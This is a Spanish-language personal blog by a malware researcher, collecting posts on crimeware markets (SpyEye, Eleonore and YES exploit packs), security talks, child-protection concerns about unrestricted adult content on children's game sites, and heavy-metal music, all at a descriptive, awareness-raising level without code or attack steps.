Jorge Mieres Blog

"Hechizo caza-pedófilo"

2012-02-04T15:43:00.001-03:00

Sería interesante ir "tachando palitos" al estilo carcelero, por cada pedófilo que se captura. Por lo menos yo me anoto! ;P

Esta es la esencia del video clip que he encontrado en Anti-Depredadores, un sitio web colombiano que se encarga de canalizar material de concientización sobre estas actividades delictivas y el cual estoy mirando cada vez que tengo algo de tiempo.

Mezclando buena música, "magia" y ciencia ficción para "destrozar" la actividad de un pedófilo más. Todo volcado en este interesantísimo video de Skrillex, llamado First Of The Year (Equinox). Valgan los créditos para @4v4t4r por su descubrimiento y publicación ;)

Reflexionar sobre las tipificaciones legales en materia de pornografía infantíl

2012-02-01T11:47:00.001-03:00

Esta mañana, comenzando un poco tarde dicho sea de paso :D, encontré entre los rezagados mensajes de mi twitter, uno que llamó mi atención por su título: ¿Es o no pornografía infantil?

Sin lugar a dudas, para gente como uno que es vocero de los peligros que realmente representan las tecnologías informáticas como vectores principales para la captación de víctimas, con el ánimo de incurrir en delitos convencionales (no-informáticos) y complejos, el texto resultará muy interesante porque deja en tela de juicio el criterio sobre si las imágenes animadas que involucran menores de edad se pueden tipificar como pornografía infantil.

Yo mismo he abordado asuntos que tienen que ver con acciones maliciosas dirigidas a menores en varias oportunidades pero desde el punto de vista de la concientización de los padres, incluso existe dando vueltas un breve video sobre una charla relacionado al tema en cuestión, pero bajo la perspectiva judicial es otra cuestión.

Un gran artículo que deja en tela de juicio los criterios sobre los que se basan las tipificaciones penales sobre la maldita pornografía infantil y que sin lugar a dudas nos invita a la reflexión, sobre todo, considerando que no en todos los países existen leyes de delitos informáticos, o sí existen poseen muchas lagunas jurídicas sobre estos aspectos de la vida delictiva.

El caso en cuestión se produjo en Colombia pero qué mejor dejarles el enlace para que puedan disfrutar, reflexionar sobre el tema planteado y, en función de ello, hablar con nuestros menores. De paso, acceden a un sitio web con mucha información sobre la lucha contra pedófilos.

PROGNOIS en VIVO

2011-05-02T17:17:00.001-03:00

Los chicos de PROGNOIS, uno de los grupos nacionales de metal progresivo más prometedor de Argentina se estará presentando el domingo 22 de mayo en las instalaciones de GIAR Music Club. Alvarez Thomas 1078, Colegiales.

El costo de la entrada es muy accesible así que seguramente contarán con un buen público y tendremos la chance de ver y escuchar el buen repertorio de los chicos de PROGNOIS. Espero también poder ver a un amigo que hace mucho no veo y forma parte de la banda :)

PROGNOIS - Femme Dragon

Cloud Mobile Office

2011-04-04T23:49:00.003-03:00

En muchos sitios está sonando con fuerza el concepto de Cloud Office (Oficina en la nube) o, mejor dicho, Mobile Office (Oficina Móvil) como un nuevo recurso en cuanto espacio de trabajo (oficina) para, precisamente, "prescindir" de una oficina ¿cómo es esto?... Te invito a mirar el siguiente video:

Por qué limitarse a tener siempre la misma oficina, si con una notebook podemos tenerla en cualquier parte del mundo ;D

Metallica, Slayer, Megadeth y Anthrax: The Big 4 :)

2011-02-23T13:17:00.000-03:00

Si hay algo realmente inigualable en el mundo de los metaleros, es tener la chance de poder asistir, de poder disfrutar y de poder poguear en un mismo recital escuchando a cuatro de las bandas más legendarias y representativas de tras metal: Metallica, Slayer, Megadeth y Anthrax.

Un solo show! El 23 de Abril en el Empire Polo Grounds de Indio, California. Una tremenda dosis de puro metal, de pura lata!

¿Cosas históricas? Sí, claro! Ver al colorado Dave Mustaine hablando con Lars Ulrich o ver la fabulosa interpretación de Am I Evil? entre The Big 4. Sólo para entendidos :D

Criminología informática, Botnets y Seguridad Preventiva

2011-02-23T08:44:00.006-03:00

Durante el año 2010 di un par de charlas bajo la bandera de MalwareIntelligence y, como muchos de ustedes saben, actualmente formo parte del equipo GReAT (Global Research & Analysis Team) de Kaspersky Lab. Por lo tanto, he decidido dejar a un costado MalwareIntelligence y liberar estas dos presentaciones para su descarga.

Ambas fueron en Argentina. La primera de ellas se llevó a cabo de la mano de mi amigo Cristian Borghello (un referente en seguridad de la información) y su comunidad Segu-Info, durante el día 28 de septiembre bajo el nombre Vive ForoS!. En esta ocasión estuve hablando sobre investigación de actividades delictivas a través de botnets, presentando investigaciones sobre Koobface, Oficla, SpyEye y Carberp.

Descarga

La segunda, se desarrolló en la provincia de Misiones (donde tengo muchos amigos) bajo el marco de Imagina 2010. El evento más importante de Misiones en el cual tuve el placer de participar en sus dos ediciones. Allí, la temática que presenté estuvo focalizada en crear concientización en torno a las amenazas más comunes de la actualidad.

Descarga

Espero que este material sea de ayuda para algo :) y, obviamente, mi dirección de correo está siempre abierta para escuchar propuestas y críticas constructivas ;D

Juegos infantiles y pornografía online

2011-02-16T17:08:00.000-03:00

Estimo que como a mi, si decimos sencillamente "juegos infantiles" en Internet, lejos está de la mente pensar en pornografía. Sin embargo, es lamentable saberlo, pero muchas páginas que ofrecen contenido de juegos online en formato flash teóricamente orientado a los infantes, no contemplan la moralidad, el respeto ni la reputación en su lista de amigos.

Voy a contarles entonces lo que me sucedió el pasado fin de semana con mi niño de 5 añitos :)

Resulta que me pide juegos sobre el legendario personaje "Pokemon" para jugar desde Internet. Desconociendo alguna página en particular, recurro a Don Google bajo el parámetro sencillo "juegos de pokemon", accediendo al primero de los enlaces ofrecidos.

Lo cierto es que abrí la página, llena de banners con alternativas a juegos en flash, y quedó al mando de la PC mi niñito. Claro, debido a que se trata supuestamente de inofensivos juegos en flash sobre Pokemon, sin mi supervisión directa.

Hasta este momento todo bien. La sorpresa fue cuando volví a los cinco minutos y lo encontré intentando jugar a uno de esos juegos en flash pero PORNOGRÁFICO, donde el objetivo era ganar puntos masturbando (a través del teclado – ¡qué loco!) a una chica. A mayor intensidad, mayor puntaje.

No es que sea un puritano exagerado, pero creo que cualquier padre no va a dejar en manos de un nene de cinco años este tipo de libertinaje. La cuestión, sin entrar en detalles, es que al rato miré de qué se trata realmente la página y efectivamente es un sitio dedicado a juegos en flash.

El problema, es que contiene una sección bajo el título "juegos eróticos" sin ninguna restricción de acceso.

No posee limitación alguna, barrera de acceso, alerta o cualquier otra advertencia que indique el tipo de contenido al cual se accede. Entonces, cualquier niño puede acceder a esta parte del sitio sin saber con exactitud el contenido. En el caso de mi hijo, quizás buscando alternativas más divertidas a Pokemon.

El sitio se encuentra en la dirección IP 217.113.249.46, en España, bajo el AS20721 [KAOSES KAOS REDES IP Barcelona].

Mi campo deacción no son precisamente las leyes, pero calculo que se trata de un delito que atenta contra la inocencia de los menores, o por lo menos se contempla, creo, dentro del marco de exhibicionismo.

Textualmente el Código Penal de España estable en su art. 185 lo siguiente, en torno a los delitos de exhibicionismo y provocación sexual: "El que ejecutare o hiciese ejecutar a otra persona actos de exhibición obscena ante menores de edad o incapaces, será castigado con la pena de prisión de seis meses a un año o multa de 12 a 24 meses".

Ahora, déjenme también agregar parte del texto sobre Delitos contra la libertad e indemnidad sexual de un curso sobre Derecho Penal de la Universidad de Murcia, en alusión a este asunto:

“La conducta típica consiste en realizar actos obscenos ante menores de edad (18 años) o incapaces. Pero, ¿qué es un acto obsceno? Estos actos se identifican en estos supuestos como "eróticos", es decir, todo aquel acto susceptible de excitar o despertar el deseo sexual.

Por ej., pensemos en un local de exhibición con un espectáculo entre un adulto y un menor. ¿Se incluiría esta conducta en el tipo penal si el menor participa también en la secuencia? En estos casos se daría un concurso de normas del art. 189-1 (utilización de menores en espectáculos de exhibicionismo o pornográficos) con el 185. Otro caso seria si el menor, por ej., está sirviendo copas como camarero en un local de este tipo (aquí queda claro que se comete un delito de exhibicionismo del art. 185,y bastará con que el menor sea un simple espectador, pues está percibiendo lo que acontece en ese local aunque no actúe en el espectáculo).

La apreciación de lo que debe o no entenderse por "obscenidad" es muy subjetiva, "hay que acudir al criterio medio de un observador objetivo, es decir, el pensar mayoritario de la sociedad" (valores sociales que prevalecen en la comunidad).

Otra cuestión es la relativa a las muestras ante menores de genitales, coitos, masturbaciones, etc. Han de ser considerados como actos graves realizados en un ambiente reducido donde se sepa que hay menores y dependiendo su calificación del contexto donde se lleve a cabo dichas conductas, es decir, hay que valorarlo todo en su justa medida”.

No se si aplica o no al caso que comento, tampoco si es un requisito legal o simplemente parte de las buenas prácticas, pero independientemente de todo y en referencia a la frase "valores sociales que prevalecen en la comunidad", creo que es indispensable colocar, antes de visualizar el contenido "erótico", una notificación similar a la expuesta en la imagen anterior.

Cuba... ¡Nos vemos en febrero!

2011-01-30T02:51:00.000-03:00

¡Comenzando el 2011 con todo! Nuevas caras, nuevos amigos, nuevos objetivos, nuevas proyecciones y sobre todo, nuevos aires; me llevan a estar participando de la XIV Convención y Feria Internacional 2011 a desarrollarse en La Habana, Cuba del 7 al 11 de febrero.

En esta oportunidad, estaré exponiendo sobre las implicancias desde el punto de vista delictivo que actualmente poseen las botnets a lo largo de todo el mundo, describiendo además algunos de los recursos delictivos más empleados y sus estrategias. El título de la charla: "Crimen organizado en Internet. Su impacto a nivel global" :)

En su página web encontrarán unas amigables palabras que dicen.. "Sea usted bienvenido al Sitio Web de la Convención y Feria Internacional Informática Habana. Su XIV edición se realizará del 7 al 11 de febrero de 2011, en el Palacio de Convenciones de La Habana y en el recinto ferial Pabexpo, con el lema "Tecnologías convergentes: integración e independencia", con el objetivo de promover los adelantos científicos, nuevas tecnologías y novedades del sector. No se pierda esta oportunidad de adquirir conocimientos, intercambiar experiencias y afianzar la amistad entre los pueblos."

Así que no sólo tendré una excelente oportunidad para charlar un poco sobre de mi experiencia en torno a la investigación de actividades delictivas a través de botnets, sino que también podré conocer las tierras de este hermoso país. Y quien sabe… quizás volver a ver aguas caribeñas ;D

Abrazo!

Extraña desaparición de Dancho Danchev

2011-01-14T17:21:00.000-03:00

Hace un tiempo la comunidad de seguridad a nivel global se mostró preocupada por el raro corte en el dinamismo de noticias con las que nos había acostumbrado el búlgaro Dancho Danchev a través de su blog personal.

Dancho es un investigador de raza que ha colaborado intensamente en la lucha contra el cibercrimen organizado que hoy todos sabemos no es ciencia-ficción. Según fuentes cercanas a Dancho, se trato de establecer contactó con él desde hace varios meses atrás sin éxito alguno. ZDNet difundió este mismo día la noticia.

Lo cierto es que se sospecha fuertemente de la existencia de un problema que Dancho pudo tener en Bulgaria y por el cual estaría siendo víctima de persecuciones propias de un servicio de inteligencia. En una supuesta carta emitida por el propio Dancho a una persona de su confianza y a modo de “escudo”, se evidencia un claro indicio de un potencial asunto que podría afectar su integridad física. En esta misma carta se adjuntan fotografías de lo que sería un sistema de escucha clandestina montado en la casa de Dancho.

Sin lugar a dudas quienes día a día colaboramos en la lucha contra el cibercrimen, e intentamos barrer esa sensación de impunidad con la cual goza la mafia organizada que opera a través de Internet, deseamos hacer extensiva esta noticia. Sobre todo para tratar de encontrar alguna respuesta, por mínima que sea, que pueda echar luz sobre el paradero y la situación de Dancho.

Jorge Mieres

Haciendo un poco de catarsis

2010-12-27T23:09:00.004-03:00

Luego de un periodo de completa inactividad [en torno a este blog ;P], hoy me tomé unos minutos para escuchar un poco de buena música y actualizar uno de mis blog [que nada tiene que ver con seguridad], y que quizás muy pocos conocerán: Voces de Metal [http://vocesdemetal.blogspot].

Funciona un poco a modo de catarsis, cada vez que hago stop y quiero escuchar un poco de sonido "simplemente brutal". Los videos son de una excelente banda de ñu metal llamada Ill Niño que posee influencia y raíces netamente latinoamericanas.

Los video son: God Save Us, que pueden ver aquí; y This Time's For Real en éste enlace.

¡Buena vida Ill Niño! :)

Criminología informática y seguridad preventiva

2010-09-29T12:42:00.000-03:00

Luego de un largo tiempo sin oficiar como disertante en algún seminario o evento, llegó el momento de participar en dos importantes eventos que durante los últimos días de octubre se desarrollarán en Argentina.

El primero de ellos corresponde a ViveForoS!, un evento organizado por Segu-Info bajo el auspicio de TATA Consultancy Services que se desarrollará durante el día 28 del mes en cuestión, y en el cual estaré charlando con los asistentes sobre los aspectos fundamentales que involucra un proceso de investigación sobre delitos cometidos a través de Internet, utilizando botnets como principal canal de ejecución.

También mostraré ejemplos prácticos y alguna demostración sobre cómo se ven por dentro algunos de los crimeware más "famosos" de la actualidad. El título de la misma es "Criminología informática a través de botnets".

La segunda, se dará bajo el marco del evento Imagina2010, la segunda edición del 1° Evento Regional de Tecnología e Internet en la provincia de Misiones (Argentina), durante los días 29 y 30 también de octubre donde estaré presentando una charla sobre seguridad llamada "Seguridad Preventiva apta para todo público".

La primera edición de este evento se llevó a cabo el año pasado (2009) durante el mes de noviembre, y en esa oportunidad también estuve participando del mismo con la charla "Seguridad antivirus en Internet". Dejo un breve video sobre la cobertura que se realizó durante el año pasado sobre dicho evento:

Para todos aquellos que estén interesados en asistir a cualquiera de los eventos anteriormente mencionados, a continuación dejo los enlaces en los que encontrarán mayor información:

ViveForoS!

Imagina2010

Están invitados y si alguno se pega una vuelta… que avise!! ;P

jorge.-

Compendio mensual de información. Abril 2010

2010-04-30T10:24:00.001-03:00

Malware Intelligence Blog - English version
30.04.2010 Una recorrida por los últimos scareware XXI
26.04.2010 Phishing database VI
19.04.2010 Scam de ZeuS sobre IRS continúa siendo activamente explotado
03.04.2010 Phishing Database V
03.04.2010 Página web del film Besouro vulnerada con ataques de phishing a PayPal

Malware Disasters Team - A division of Malware Intelligence
24.04.2010 Copyright violation: copyrighted content detected
19.04.2010 New variant of ransomware through porn sites

ESET Latinoamérica Blog
29.04.2010 Nueva estrategia ransomware utiliza derechos de autor
28.04.2010 Koobface continúa su campaña de propagación
24.04.2010 Troyano para Mac OS
14.04.2010 Ransomware desarrollado para Mac OS
09.04.2010 La Gira Antivirus se presenta en Panamá
05.04.2010 El problema de los paquetes con Exploits
02.04.2010 La Gira Seguridad Antivirus llega a Ecuador

Información relacionada
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Compendio mensual de información 2009
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Compendio mensual de información. Marzo 2010

2010-03-31T10:22:00.001-03:00

Malware Intelligence Blog - English version
31.03.2010 Strike Botnet, otra crimeware que nace
28.03.2010 Web de Hooters Alemania comprometida con phishing a HSBC
28.03.2010 iPack y GOLOD. Nuevos crimeware en la escena delictiva
27.03.2010 Phishing Database IV
19.03.2010 Archivo .sys utilizado en el ataque Aurora - Análisis externo del archivo
15.03.2010 Nueva campaña de phishing contra Facebook encabezada por ZeuS
12.03.2010 Campaña de phishing orientada a jugadores de Zynga
07.03.2010 Oficla botnet con más de 200.000 zombis reclutados
06.03.2010 myLoader. Framework para la gestión de botnets

Malware Disasters Team - A division of Malware Intelligence
13.03.2010 Dangerous trojans, keyloggers and Spyware detected in you computer!!!
07.03.2010 myLoader. Base C&C to manage Oficla/Sasfis Botnet
05.03.2010 Another very active SMS Ransomware
04.03.2010 SMS Ransomware for Windows In-the-Wild

Security Intelligence - A division of Malware Intelligence
27.03.2010 Phishing Database IV
07.03.2010 myLoader. Base C&C to manage Oficla/Sasfis Botnet

ESET Latinoamérica Blog
31.03.2010 Reporte de amenazas de Marzo
30.03.2010 Campaña de infección utilizando la bomba en Moscú como excusa
26.03.2010 SEO Poisoning con la erupción de volcán en Islandia
23.03.2010 Masiva campaña de infección a través de páginas pornográficas
17.03.2010 Phishing alojado en página gubernamental de Colombia
15.03.2010 Phishing contra usuarios de entidades de República Dominicana

Información relacionada
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Compendio mensual de información 2009
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Compendio mensual de información. Febrero 2010

2010-03-05T11:37:00.003-03:00

Malware Intelligence Blog - English version
27.02.10 Phishing database III
24.02.10 Scam de ZeuS sobre IRS continúa siendo activamente explotado
24.02.10 Nueva campaña de phishing de ZeuS contra Google y Blogger
22.02.10 Campaña de phishing a Facebook y VISA propuesta por ZeuS
16.02.10 Phishing database II
13.02.10 Ingeniería Social explotando juegos olímpicos 2010
12.02.10 Disección de un kit fraudulento. Wachovia phishing attack
10.02.10 SpyEye Bot. Análisis de una nueva alternativa del escenario crimeware
09.02.10 Phishing database I
06.02.10 Nuevo blog personal

Malware Disasters Team - A division of Malware Intelligence
23.02.10 SpyEye Bot (Part two). Conversations with the creator of crimeware
10.02.10 SpyEye Bot. Analysis of a new alternative scenario crimeware

Security Intelligence - A division of Malware Intelligence
28.02.10 Phishing database III
16.02.10 Phishing database II
09.02.10 Phishing database I
06.02.10 Justifying the unjustifiable in a world criminal

Evil Fingers Blog
20.02.10 IRS Scam Campaign on proposal by ZeuS
11.02.10 SpyEye Bot. Analysis of a new alternative scenario crimeware
11.02.10 New personal blog
11.02.10 Automation in creating exploits II

ESET Latinoamérica Blog
01.03.10 Reporte de amenazas de Febrero
25.02.10 Disponible ESET Security Report de Latinoamérica
23.02.10 Seguridad en Cloud Computing
18.02.10 ¿Qué hay de cierto respecto a la botnet Kneber?
02.02.10 Campaña de infección orientada a usuarios de Brasil

Información relacionada
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Compendio mensual de información 2009
Diciembre - Noviembre - Octubre - Septiembre - Agosto - Julio
Junio - Mayo - Abril - Marzo - Febrero - Enero

Jorge Mieres

SpyEye se mete de lleno en la escena del crimeware

2010-02-20T23:24:00.003-03:00

SpyEye es un troyano que se caracteriza fundamentalmente por dos razones: su similitud con lo que hasta el momento podríamos llamar "la creme de la creme": ZeuS; y la incorporación de una funcionalidad que permite "cortar la cabeza de ZeuS" de los equipos que compartan infección con SpyEye. La siguiente imagen muestra la bienvenida al C&C (Panel de comando y control) de SpyEye.

Además, al igual que ZeuS posee funciones de keylogging registrando información sensible y privada de los equipos víctimas, entre muchas otras, todas administrables vía web desde un panel de control.

Por otro lado, desde el punto de vista "visual", el autor de SpyEye de esforzó en crear un paquete "bonito" con iconografía descriptiva que hacen de esto un sistema de gestión criminal bastante intuitivo, ideal para los aspirantes a ciberdelincuentes.

En este sentido, cabe aclarar que estas últimas palabras (que parecen destacar este crimeware como si fuese algo interesante) no buscan promocionar ni legitimar este ni ningún otro crimeware, ni tampoco las actividades que podrían realizarse por intermedio de ellas. Aclarado de forma breve este asunto, a continuación pueden ver una imagen que muestra el módulo de estadísticas que, aunque bastante rústico, se encuentra hecho en flash (algo no tan común en este tipo de crimeware).

Con respecto a este crimeware, desde Malware Intelligence hemos hecho una cobertura de sus actividades, canalizando parte de la información obtenida a través de dos informes que describen sus actividades tanto desde el punto de vista técnico como, por decirlo de alguna forma, desde el punto de vista psicosocial, "mano a mano con su creador".

SpyEye Bot. Nuevo bot en el mercado (versión en inglés)
Esta noticia fue escrita por Mariano Miguel quien es Malware Researcher en Malware Intelligence.

SpyEye Bot. Análisis de una nueva alternativa del escenario crimeware (versión en inglés)
Este documento describe las actividades de SpyEye desde una perspectiva técnica y fue escrito por quien esto escribe. Agradezco a INTECO-CERT de España por hacerse eco de este documento y publicarlo en su sección de Estudios e Informes. También agradezco a Darren Spruell de EmergingThreats por crear la firma IDS en función de la información proporcionada.

SpyEye Bot (Part two). Conversations with the creator of crimeware (sólo en inglés).
La segunda parte del informe, fue escrito por Ben Koehl quien es Crimeware Researcher de Malware Intelligence, y por el momento se encuentra disponible sólo en inglés. Mis felicitaciones a Ben por la investigación y a los amigos de la casa NoVirusThanks por también publicar ambos papers.

Malware Intelligence en SANS Audiocast

2010-02-08T18:40:00.005-03:00

SANS (SysAdmin, Audit, Network, Security) es el Instituto más conocido sobre todo lo relacionado a seguridad de la información y cabeza de las certificaciones más prestigiosas. Cuenta con un amplio repertorio de documentación de investigación y además posee un sistema de alerta temprana ante incidentes de seguridad denominado Internet Storm Center. Sin lugar a dudas representa la fuente de información más grande.

Posee una sección llamada SANS Audiocast a cargo del instructor John Strand donde semanalmente publican un audio exponiendo diversas temáticas relevantes en materia de seguridad, y en su episodio #3 del 12 de enero de 2010, Malware Intelligence formó parte del mismo bajo la temática Crimeware-as-a-Service and antivirus evasion schemes.

Descarga del audio

Jorge Mieres

Malware Intelligence Rogue database en Malware Domain Blocklist (DNS-BH)

2010-02-08T10:00:00.002-03:00

Como ya sabemos, el rogue (también conocido bajo el término scareware) es un tipo de malware, que básicamente simula ser un programa de seguridad, habitualmente un antivirus, y que en todo momento intenta que la víctima compre el supuesto antivirus o herramienta de seguridad a través de una estrategia agresiva de advertencias sobre problemas de infección que, por supuesto, son falsos.

El uso de Ingeniería Social se ha transformado en un patrón indiscutible para la diseminación/infección de esta amenaza, y aunque no deja de ser un tipo de código dañino más, responde a la generación de malware que centra sus esfuerzos en robar dinero por intermedio de acciones fraudulentas.

Quizás uno de los "detalles" que vale la pena no dejar pasar es que, si bien, podemos aproximar, algo así como más del 90% (y quizás más) del rogue que actualmente circula por Internet se encuentra diseñado para plataformas Windows, existen casos para MacOS (aún no he visto para Linux) por lo que no me sorprendería cruzarme con alguno diseñado para telefonía celular de alta gama.

Quienes se encuentran detrás de su diseminación forman parte, como asociados (afiliados), de un negocio realmente grande, donde de forma siempre fraudulenta se perfeccionan las estrategias destinadas a atraer prospectos desde diferentes capas, a saber:

Estrategia de Comunicación. A través de un plan de Ingeniería Social.
Estrategia de Marketing. A través de BlackHat SEO y cambios de nombre.
Estrategia de Soporte. A través de mulas.
Estrategia de Venta. A través de alertas sobre falsas infecciones.

Dentro de este ciclo de propagación/infección se utilizan varias técnicas (BlackHat SEO, exploit pack, cifrado, fast-flux, entre otros) que no dicen más que… "Hey, Ladies & Gentlemen, tengan cuidado… nos perfeccionamos cada vez más", dejando en evidencia su profesionalización dentro del esquema de oportunidades delictivas que ofrecen los creadores de rogue.

Desde Malware Intelligence hemos hecho una cobertura bastante extensa durante el 2009, bajo el nombre Una recorrida por los últimos scareware (A recent tour of scareware), exponiendo información sobre las familias de rogue más relevantes, mencionando sólo el más conocido de cada familia; y donde nuestra intención es proporcionar información que permita prevenir los casos de infección, por ejemplo, bloqueando las direcciones IP.

Una recorrida por los últimos scareware XX – Versión en inglés

Ahora Malware Intelligence forma parte de la base de datos de Malware Domain Blocklist (DNS-BH) colaborando con la información recolectada sobre scareware.

En el siguiente enlace pueden obtener la lista con direcciones IP y nombre de dominios que poseen contenidos maliciosos obtenidos desde Malware Intelligence, junto a las de malwareurl.com: 182 malicious domains to block.

Jorge Mieres

Eleonore Exploit Pack y su evolución en el campo del crimeware

2010-02-06T02:11:00.003-03:00

Eleonore Exploit Pack es un crimeware que desde su aparición a mediados del 2009 cuenta con amplia aceptación en el mercado underground. Actualmente es muy utilizado para reclutar zombis infectando los equipos con malware que se ejecuta explotando vulnerabilidades.

En el caso de este exploit pack en particular, la última versión (1.3.2) posee, por defecto, la posibilidad de atacar a través de 14 debilidades en varias aplicaciones. En este sentido cabe mencionar que muchos de los exploits incorporados poseen solución a través de su parche desde hace varios años (MS06-006 por ejemplo); aún así, el índice de infección explotando estas vulnerabilidades es alto.

Aunque la problemática que se presenta no es para nada trivial, a esta altura del partido ya no nos sorprende, sobre todo, luego de conocer el ataque dirigido llamado "Operación Aurora" cuyo malware rompió las barreras de seguridad de grandes compañías explotando una vulnerabilidad crítica en Internet Explorer 6.

En Malware Intelligence hemos escrito un pequeño informe que describe su evolución, mencionando los exploit incorporados en cada una de sus seis versiones, con el costo de cada una de ellas en función del momento en que era lanzado al mercado clandestino. Cabe mencionar que aunque todavía no es oficial, se estima que la última versión está siendo comercializada a un valor de 1200 dólares estadounidenses.

El artículo llamado Estado del arte en Eleonore Exploit Pack lo pueden leer tanto en inglés como en español. Otras referencias son:

Eleonore Exploit Pack. Nuevo crimeware In-the-Wild (version en ingles)

Nueva version de Eleonore Exploit Pack In-the-Wild

Otros amigos de la casa que han abordado a Eleonore Exploit Pack son Brian Krebs desde su blog KrebsOnSecurity y Giuseppe Bonfa con un interesante análisis del exploit pack escrito en su blog EvilCodeCave.

Jorge Mieres

Justificando lo injustificable de un mundo delictivo

2010-01-16T21:33:00.000-03:00

Como muchos de los lectores sabrán, desde Malware Intelligence venimos investigando las implicancias directas de toda esta nueva generación de códigos maliciosos y actividades delictivas que día a día retro-alimentan el negocio del crimewar e.

Bajo esta premisa, las investigaciones centran sus esfuerzos en tratar de revelar las diferentes ramificaciones que se enredan entre sí dentro de una maraña de acciones ilícitas tendientes, fundamentalmente, a obtener dinero de los usuarios a través de técnicas no-éticas. Y en función de esto… ¿aún quedan dudas que estamos frente a un gran negocio que lucra a través de actividades que rozan la ilegalidad? (obviamente, siempre de acuerdo a la legislación vigente de cada país). Creo que la respuesta unánime es NO.

Salvada esta apreciación, luego de tanto exponer contenido en torno al estado del arte del crimeware, incluso aún sin exponer datos relevantes para no entorpecer la continuidad de las investigaciones, ya se ha tornado un aspecto común recibir mensajes y comentarios, en su mayoría agresivos, de los responsables del desarrollo o de la comercialización de determinadas aplicaciones crimeware.

Bajo este escenario, y si bien no soy de dar explicaciones sobre las investigaciones que realizamos, en esta oportunidad haré una excepción exponiendo dos de los últimos comentarios que hemos recibido de parte de quienes forman parte del negocio del crimeware.

Sobre todo, porque en cierta forma reflejan la filosofía (de vida y mental) de quienes operan desde la clandestinidad, aunque últimamente las cosas están cambiando.

El primero de los casos es un mensaje anónimo, no-agresivo que en lo personal debo confesar que… muy simpático :) dejado por uno de los Partners que comercializa el crimeware YES Exploit System. El comentario fue dejado en el artículo que habla de este Exploit pack, y en el cual también encontrarán mi respuesta. El comentario es el siguiente:

YES, We are the blackhats :)
Thanks for small review, but why do ppl think that blackhats are poor guyz?
It's just a business, no less, no more :) Do you wanna buy our excellent product? - there is discounts for you ;)

Como dicen mis "amigos", para ellos es "solo un negocio, ni más ni menos". Sin embargo, convengamos en que, además de no ser un negocio convencional, representa un modelo de negocio que colabora directa y activamente con actividades delictivas, lo cual no es tan gracioso.

Ahora, YES Exploit System es un crimeware que posee mucho desarrollo en su código y cuyo valor en el mercado es de USD 800. Y lo que sí resulta gracioso (según la última oración del cometario) es saber que no obtendré descuento alguno sobre el crimeware ;)

El segundo caso que quiero dar a conocer es un poco más agresivo y fue en función de lo escrito en el informe sobre el servicio ruso destinado a comprobar la detección de malware, en el mismo pueden leer el comentario y mi respuesta, la cual no transcribo aquí por su longitud. El mensaje dice así:

"In summary, further evidence that not only the exploitation of malware generates profits but also moves parallel money on services to
this industry. And in some cases like the present one, have to see if you can consider this service as a criminal act or not."

Wow and why would this service be criminal act?

It's clear to me that someone has a year work in a software like this scanner and he want to make money with it.
If you don't like it don't use it. Noone forces you to pay for it or submit files there but since I see you are a little wanker
blogger who does not respect others work I giving it to you straight.

You have no inside experience in the antivirus industry whatsoever otherwise you would know that VirusTotal distributes 200K files/day
to antivirus companies for FREE. AV companies are shit on online scanners, they wouldn't even contact you if you would ask them about file
distribution and they definately wouldn't support an online scanner so what else can these services do to remain online?

Before you criticizing others work put something down on the table little frustrated shit..."

Independientemente de la connotación agresiva que presenta este segundo comentario, lo interesante es de quien viene. Alguien que utiliza como nick la palabra "KLESK" y responsable de "un intento de negocio" completamente delictivo, en cuya página una de las primeras cosas que leemos es "Selling corporate data, trade secrets" (Venta de datos corporativos, secretos comerciales).

"We sell corporate data and trade secrets" (Nosotros vendemos los datos corporativos y los secretos comerciales), continúa la propaganda. Aclarando además qué tipo de información supuestamente "roban" a las empresas, y rematando con algo muy curioso:

"Please losers/asszors stay away, all the data bids start on 5 figures" :: Sin palabras… :)

En fin, particularmente este último caso representa una buena oportunidad para analizar la psicología de un prospecto a ciber-delincuente cuyo intento de "negociar" no sólo deja mucho que desear sino que ni siquiera puede ser evaluado como una posibilidad a tener en cuenta como objeto de investigación.

Información relacionada
Russian service online to check the detection of malware
YES Exploit System. Otro crimeware made in Rusia

Jorge Mieres

YES Exploit System. Official Business Partner’s

2010-01-16T15:10:00.000-03:00

Sin lugar a dudas, el negocio que representa el crimeware en la actualidad se expande cada día más. No sólo se refleja este aspecto en la profesionalización en torno al desarrollo y explotación de las diferentes aplicaciones y tecnologías informáticas empleadas para delinquir y realizar ataques vía web, sino también en las estrategias de venta que se emplean para canalizar la atención de un mayor volumen de mentes inquietas, que buscan obtener ~~robar~~ el dinero de los demás empleando como base de negocio, alguna botnet.

Si bien aún el 90% de la venta de crimeware se lleva a cabo en un ambiente underground donde la oferta es propuesta directamente por el creador del crimeware, los ciber-delincuentes están llevando su negocio clandestino a un plano "más claro" y "más alto", publicitando sus desarrollos a través de sitios web exclusivamente diseñados para ofrecer sus "servicios", pero a través de "asociados de negocio" que se encargan de la logística del asunto.

A principios del año 2009 mencionábamos el caso de la venta, vía web, de Unique Sploit Pack, uno de los exploit pack de propósito general más demandados en la actualidad, cuyo sitio web de comercio estuvo online un tiempo hasta que fue dado de baja precisamente por tratarse de un crimeware.

Sin embargo, esta estrategia de marketing y venta vuelve al plano mayor de la mano de YES Exploit Pack, otro crimeware de los más activos actualmente.

Bajo el slogan "Improve your business with YES Exploit System. Exploit Pack from Russia" (Mejore su negocio con YES Exploit System. Un Exploit pack desde Rusia) se propone la venta de la versión 2 de este exploit pack a través de un sitio web registrado en Rusia.

La campaña de propaganda (estrategia de marketing) desde el sitio web radica en explicar brevemente cuáles son las características más sobresalientes del crimeware, a modo de justificar por qué es mejor que otros paquetes de su estilo (la competencia). Su costo es de USD 800 y la transacción se realiza, como habitualmente se hace, a través de WebMoney.

El negocio del crimeware expande sus recursos logísticos y esto evidentemente es una prueba fiel que manifiesta la evolución de un mercado clandestino, o ya no tan clandestinos, cuyos retos no solo radican en aspectos técnicos buscando alternativas que permitan evadir los mecanismos de análisis.

Información relacionada
YES Exploit System. Otro crimeware made in Rusia
YES Exploit System. Manipulando la seguridad del atacante
El crimeware durante el 2009
Los precios del crimeware ruso. Parte 2
Comercio Ruso de versiones privadas de crimeware...
Panorama actual del negocio originado por crimeware

Jorge Mieres

